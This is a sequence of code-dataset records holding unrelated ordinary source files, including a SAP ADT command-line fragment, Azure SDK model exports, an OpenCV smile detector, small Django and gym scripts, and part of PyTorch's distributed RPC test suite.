write_cmd.append_argument('--warning-errors', action='store_true',
default=False, help='Treat Activation warnings as errors')
write_cmd.declare_corrnr()
return write_cmd
def define_activate(self, commands):
"""Declares the Activate command with its parameters and returns the
definition.
Notice that it allows multiple names on input.
"""
activate_cmd = commands.add_command(self.activate_objects, name='activate')
activate_cmd.append_argument('name', nargs='+')
activate_cmd.append_argument('--ignore-errors', action='store_true',
default=False, help='Do not stop activation in case of errors')
activate_cmd.append_argument('--warning-errors', action='store_true',
default=False, help='Treat Activation warnings as errors')
return activate_cmd
def define(self):
"""Defines the commands Create, Read, Write, and Activate and returns
the command list
"""
cls = self.__class__
if hasattr(cls, '_instance'):
return None
# pylint: disable=protected-access
cls._instance = self
commands = cls.get_commands()
self.define_create(commands)
self.define_read(commands)
self.define_write(commands)
self.define_activate(commands)
return commands
def build_new_object(self, connection, args, metadata):
"""Creates an instance of the ADT Object proxy class for a new object"""
return self.instance(connection, args.name, args, metadata=metadata)
def create_object(self, connection, args):
"""Creates the given object."""
metadata = self.build_new_metadata(connection, args)
obj = self.build_new_object(connection, args, metadata)
obj.description = args.description
obj.create(corrnr=args.corrnr)
def read_object_text(self, connection, args):
"""Retrieves the request command prints it out based on command line
configuration.
"""
obj = self.instance(connection, args.name, args)
print(obj.text)
# pylint: disable=no-self-use
def build_activator(self, args):
"""For children to customize"""
activator = sap.cli.wb.ObjectActivationWorker()
activator.continue_on_errors = args.ignore_errors
activator.warnings_as_errors = args.warning_errors
return activator
def write_object_text(self, connection, args):
"""Changes source code of the given program include"""
toactivate = collections.OrderedDict()
printout('Writing:')
for obj, text in write_args_to_objects(self, connection, args):
printout('*', str(obj))
with obj.open_editor(corrnr=args.corrnr) as editor:
editor.write(''.join(text))
toactivate[obj.name] = obj
if not args.activate:
return 0
activated_items = toactivate.items()
return activate_object_list(self.build_activator(args), activated_items, count=len(activated_items))
def activate_objects(self, connection, args):
"""Actives the given object."""
activated_items = ((name, self.instance(connection, name, args)) for name in args.name)
return activate_object_list(self.build_activator(args), activated_items, count=len(args.name))
# pylint: disable=abstract-method
class CommandGroupObjectMaster(CommandGroupObjectTemplate):
"""Commands for objects that belongs to a package.
The class CommandGroupObjectTemplate defines the command create without the
parameter packages because there are objects that belongs to a container
object (i.e. Function Module).
"""
def build_new_metadata(self, connection, args):
"""Creates an instance of the ADT Object Metadata class for a new object"""
return sap.adt.ADTCoreData(language='EN', master_language='EN',
package=args.package.upper(), responsible=connection.user.upper())
def define_create(self, commands):
"""Calls the super's define_create and inserts the parameter package
right behind the parameter description
"""
create_cmd = super().define_create(commands)
create_cmd.insert_argument(2, 'package')
return create_cmd
| [
"[email protected]"
] | |
9902776c082c92c16c89cd39d922e4b461482b88 | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_05_01_preview/models/__init__.py | b555500e3ca24979e6c5c02f7be553bf65fd61c7 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 3,815 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import AccessReviewDecision
from ._models_py3 import AccessReviewDecisionListResult
from ._models_py3 import AccessReviewDecisionProperties
from ._models_py3 import AccessReviewDecisionTarget
from ._models_py3 import AccessReviewDefaultSettings
from ._models_py3 import AccessReviewInstance
from ._models_py3 import AccessReviewInstanceListResult
from ._models_py3 import AccessReviewReviewer
from ._models_py3 import AccessReviewScheduleDefinition
from ._models_py3 import AccessReviewScheduleDefinitionListResult
from ._models_py3 import AccessReviewScheduleDefinitionProperties
from ._models_py3 import AccessReviewScheduleSettings
from ._models_py3 import ErrorDefinition
from ._models_py3 import ErrorDefinitionProperties
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationListResult
from ._models_py3 import ServicePrincipalDecisionTarget
from ._models_py3 import UserDecisionTarget
from ._authorization_management_client_enums import AccessRecommendationType
from ._authorization_management_client_enums import AccessReviewActorIdentityType
from ._authorization_management_client_enums import AccessReviewApplyResult
from ._authorization_management_client_enums import AccessReviewInstanceStatus
from ._authorization_management_client_enums import AccessReviewRecurrencePatternType
from ._authorization_management_client_enums import AccessReviewRecurrenceRangeType
from ._authorization_management_client_enums import AccessReviewResult
from ._authorization_management_client_enums import AccessReviewReviewerType
from ._authorization_management_client_enums import AccessReviewScheduleDefinitionReviewersType
from ._authorization_management_client_enums import AccessReviewScheduleDefinitionStatus
from ._authorization_management_client_enums import AccessReviewScopePrincipalType
from ._authorization_management_client_enums import DecisionTargetType
from ._authorization_management_client_enums import DefaultDecisionType
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
"AccessReviewDecision",
"AccessReviewDecisionListResult",
"AccessReviewDecisionProperties",
"AccessReviewDecisionTarget",
"AccessReviewDefaultSettings",
"AccessReviewInstance",
"AccessReviewInstanceListResult",
"AccessReviewReviewer",
"AccessReviewScheduleDefinition",
"AccessReviewScheduleDefinitionListResult",
"AccessReviewScheduleDefinitionProperties",
"AccessReviewScheduleSettings",
"ErrorDefinition",
"ErrorDefinitionProperties",
"Operation",
"OperationDisplay",
"OperationListResult",
"ServicePrincipalDecisionTarget",
"UserDecisionTarget",
"AccessRecommendationType",
"AccessReviewActorIdentityType",
"AccessReviewApplyResult",
"AccessReviewInstanceStatus",
"AccessReviewRecurrencePatternType",
"AccessReviewRecurrenceRangeType",
"AccessReviewResult",
"AccessReviewReviewerType",
"AccessReviewScheduleDefinitionReviewersType",
"AccessReviewScheduleDefinitionStatus",
"AccessReviewScopePrincipalType",
"DecisionTargetType",
"DefaultDecisionType",
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| [
"[email protected]"
] | |
155abd7d13912aa0987c80a0c964ad7d4fc7990e | 09b22d1bd1263e4082e6bba7afa2f2b7a66afd4a | /FaceDetection/Smile Detector.py | 5dfcb45bf4e354761a24d3842578b36decee18d7 | [] | no_license | yogeshkushwahait/Machine-Learning-Using-Python | b70bc5334c4178fecc175451b8b7e04e50a60917 | 8102ce7b0cba5d48e923f979ae0a8e71c25857b1 | refs/heads/master | 2022-03-28T05:21:24.332537 | 2019-11-05T06:34:00 | 2020-01-09T16:06:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,172 | py |
# coding: utf-8
# In[2]:
import cv2
# In[3]:
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
smile_cascade = cv2.CascadeClassifier('haarcascade_smile.xml')
# In[4]:
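# detect() runs the Haar cascades on one video frame: faces are searched on the
# grayscale image, and for every detected face the eye and smile cascades are applied
# to the corresponding region of interest; matches are outlined on the color frame
# with rectangles (blue for faces, green for eyes, red for smiles).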
def detect(gray,frame):
faces = face_cascade.detectMultiScale(gray, 1.3,5)
for (x,y,w,h) in faces:
cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h,x:x+w]
roi_color = frame[y:y+h,x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray, 1.1,22)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
smiles = smile_cascade.detectMultiScale(roi_gray, 1.7,22)
for (sx,sy,sw,sh) in smiles:
cv2.rectangle(roi_color,(sx,sy),(sx+sw,sy+sh),(0,0,255),2)
return frame
# In[5]:
video_capture = cv2.VideoCapture(0)
while True:
_, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
canvas = detect(gray, frame)
cv2.imshow('Video', canvas)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
4402400f9646593187e43c7982a4e61d0d01b033 | 786de89be635eb21295070a6a3452f3a7fe6712c | /pandas/tags/V00-00-02/SConscript | b42efd570012fd5fb90cb1ffb13d916266eb5ce8 | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | #------------------------------------------------------------------------
# File and Version Information:
# $Id: SConscript 4651 2012-10-26 16:55:30Z [email protected] $
#
# Description:
# SConscript file for package pandas
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
from os.path import join as pjoin
from SConsTools.standardExternalPackage import standardExternalPackage
pkg = "pandas"
pkg_ver = "0.13.1b"
PREFIX = pjoin('$SIT_EXTERNAL_SW', pkg, pkg_ver)
PYDIR = pjoin('$PYTHON_LIBDIRNAME', '$PYTHON', "site-packages")
PKGINFO = (pkg, pkg_ver, '$PYTHON', '$SIT_ARCH.found')
standardExternalPackage(pkg, **locals())
| [
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] | [email protected]@b967ad99-d558-0410-b138-e0f6c56caec7 |
|
e51fbe1d83fc18c0809ef65f62e0f7a148dfdd77 | a672f984782a1fa328069363671c328da3e4d8bd | /weatherdaily/views.py | 40d1077ff5095487d6bbd95bd1a79c2aceed8864 | [] | no_license | avs8/yourweather | 396a0b093cbc9fc9b501eb979418e10eecfadf2b | 2415769dad416c9fcf99d57cba93b455d30447fc | refs/heads/master | 2021-08-29T08:11:16.664340 | 2017-12-13T14:15:44 | 2017-12-13T14:15:44 | 112,365,929 | 0 | 0 | null | 2017-12-11T14:35:38 | 2017-11-28T17:20:17 | JavaScript | UTF-8 | Python | false | false | 558 | py | from django.shortcuts import render, render_to_response
from .forms import WeatherForm
from django.http import HttpResponse
from django.template import RequestContext
from .models import *
def index(request):
args = {}
if request.POST:
form = WeatherForm(request.POST)
if form.is_valid():
form.save()
return HttpResponse("Thanks for submitting your information!!")
else:
form = WeatherForm()
args = {}
args['form'] = form
return render(request, 'weatherdaily/index.html', args)
| [
"[email protected]"
] | |
22026862c4779187068f89cb47fe0e6b11a7c0f0 | 18a6b272d4c55b24d9c179ae1e58959674e53afe | /tf_rl/test/CartPole/CartPole_recording_test.py | b8d3760e15ebd4d0ca5d66f39bae6090d71f9a17 | [
"MIT"
] | permissive | Rowing0914/TF2_RL | 6cce916f409b3d4ef2a5a40a0611908f20d08b2c | c1b7f9b376cbecf01deb17f76f8e761035ed336a | refs/heads/master | 2022-12-10T09:58:57.456415 | 2021-05-23T02:43:21 | 2021-05-23T02:43:21 | 233,476,950 | 9 | 1 | MIT | 2022-12-08T07:02:42 | 2020-01-12T23:53:48 | Python | UTF-8 | Python | false | false | 503 | py | import gym
env = gym.make('CartPole-v0')
# assign the wrapped env back; otherwise the Monitor wrapper is discarded and no video is recorded
env = gym.wrappers.Monitor(env, './tmp/cartpole-experiment-1', force=True, video_callable=lambda episode_id: True)
for i_episode in range(20):
observation = env.reset()
for t in range(100):
env.render()
print(observation)
action = env.action_space.sample()
observation, reward, done, info = env.step(action)
if done:
print("Episode finished after {} timesteps".format(t + 1))
break
env.close()
| [
"[email protected]"
] | |
21fe54b94c5e5b3cd05505d1e5b489b734e9a820 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/helpers/typeshed/stubs/setuptools/setuptools/_distutils/archive_util.pyi | 38458fc0e00349e77ebf105fdf5a52e850bc9e25 | [
"Apache-2.0",
"MIT"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 548 | pyi | def make_archive(
base_name: str,
format: str,
root_dir: str | None = ...,
base_dir: str | None = ...,
verbose: int = ...,
dry_run: int = ...,
owner: str | None = ...,
group: str | None = ...,
) -> str: ...
def make_tarball(
base_name: str,
base_dir: str,
compress: str | None = ...,
verbose: int = ...,
dry_run: int = ...,
owner: str | None = ...,
group: str | None = ...,
) -> str: ...
def make_zipfile(base_name: str, base_dir: str, verbose: int = ..., dry_run: int = ...) -> str: ...
| [
"[email protected]"
] | |
26556f32fd856b8732227ea6ddcc48bd711e6877 | 4412fd856cfbdfab98122b11ea01e447a76851b3 | /rodentdb/querysets.py | 063568ed8e0276d9a070a898fd61d93c93f1a13b | [] | no_license | fchampalimaud/rodentdb | d8e8c0c7552de638d3a2fd57de287401997fdf3c | 4a970c09da78f22a8c57d8ea98d29a569f531613 | refs/heads/master | 2021-06-18T02:05:19.200858 | 2019-09-17T18:09:57 | 2019-09-17T18:09:57 | 185,334,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | from django.db import models
from users.mixins import PyformsPermissionsMixin
# FIXME import this when users model is not present
# try:
# from users.mixins import PyformsPermissionsMixin
# except ImportError:
# PyformsPermissionsMixin = None
# # PyformsPermissionsMixin = object
class RodentQuerySet(PyformsPermissionsMixin, models.QuerySet):
...
| [
"[email protected]"
] | |
5a850bb6a63234b950eedb091013eaf3870c052c | 88237dd1932c346acade7001f22d0fc7190da55c | /torch/testing/_internal/distributed/rpc/rpc_test.py | a149c541a090e422aa02b0beb16eeb237c85ba35 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | kkleidal/pytorch | 4d7e95d0035bb03509dce6624e857c118279d08d | 815d38395a5081adef6ecec3372474f6f41b2a7c | refs/heads/master | 2023-02-06T11:00:27.985596 | 2020-12-17T17:30:02 | 2020-12-17T17:32:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178,866 | py | import concurrent.futures
import contextlib
import json
import logging
import os
import sys
from threading import Lock
import time
import unittest
from collections import namedtuple
from functools import partial
from unittest import mock
import torch
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu, captured_output
from torch.testing._internal.common_utils import IS_MACOS, load_tests
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
single_threaded_process_group_agent,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::threshold",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a):
self.a = a
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1 + 3)
def _test_self_remote_rref_as_rpc_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, torch.ones(2, 2) + 1))
self.assertEqual(ret, torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2) + 1)
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2))
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_rpc_arg(dst)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._test_self_remote_rref_as_rpc_arg(rpc.get_worker_info())
def _test_self_remote_rref_as_remote_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
self.assertEqual(
ret_rref.to_here(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2)
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_remote_arg(dst)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
